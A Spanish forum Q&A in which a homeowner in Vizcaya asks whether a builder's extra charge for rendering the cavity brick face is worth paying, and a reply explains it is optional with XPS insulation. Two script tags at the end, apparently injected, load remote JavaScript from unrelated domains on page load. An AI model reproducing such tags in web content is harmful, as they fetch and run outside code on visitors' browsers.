Raseado y talochado en cámaras

Estoy construyendo mi casa,. Ahora están cerrando las fachadas y al hacer la certificación me incluyen el raseado y talochado en cámaras, que es dar una capa de mortero recubriendo la capa de ladrillo. Solo ha hecho una pequeña parte por el momento. Esta partida no estaba incluida en el proyecto del arquitecto y tampoco estaba presupuestada, es más, el constructor me dijo que me la hacía pero que estaba incluida y ahora en cambio me la cobra aparte. No me ha gustado el detalle y le he dicho que no me haga, pero quisiera saber si me voy a arrepentir. El me dice que no es absolutamente necesaria, pero si recomendable. El aislamiento es con poliestireno estruido y la fachada va revestida con monocapa. La casa es en Vizcaya, temperaturas suaves, pero mucha lluvia, aunque tengo aleros de un metro y aceras alrededor de la casa.

1 respuesta

Respuesta

En principio es recomendable pero no necesario (normativas a parte).

Se coloca ese revestimiento para alojar el aislamiento o, más importante, para añadir una barrera de vapor en casos en que ésta sea necesaria. Si el aislamiento que colocas es poliestireno extruido (XPS) y no se prevé la barrera de vapor puedes perfectamente prescindir del revestimiento que comentas.

Una puntualización, por lo que explicas en tu pregunta o lo que te puedan estar diciendo. Ese revestimiento no cumple ninguna función desde el punto de vista de la lluvia o de la impermeabilización de la fachada.

Respuesta concreta y precisa. Muchas gracias

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>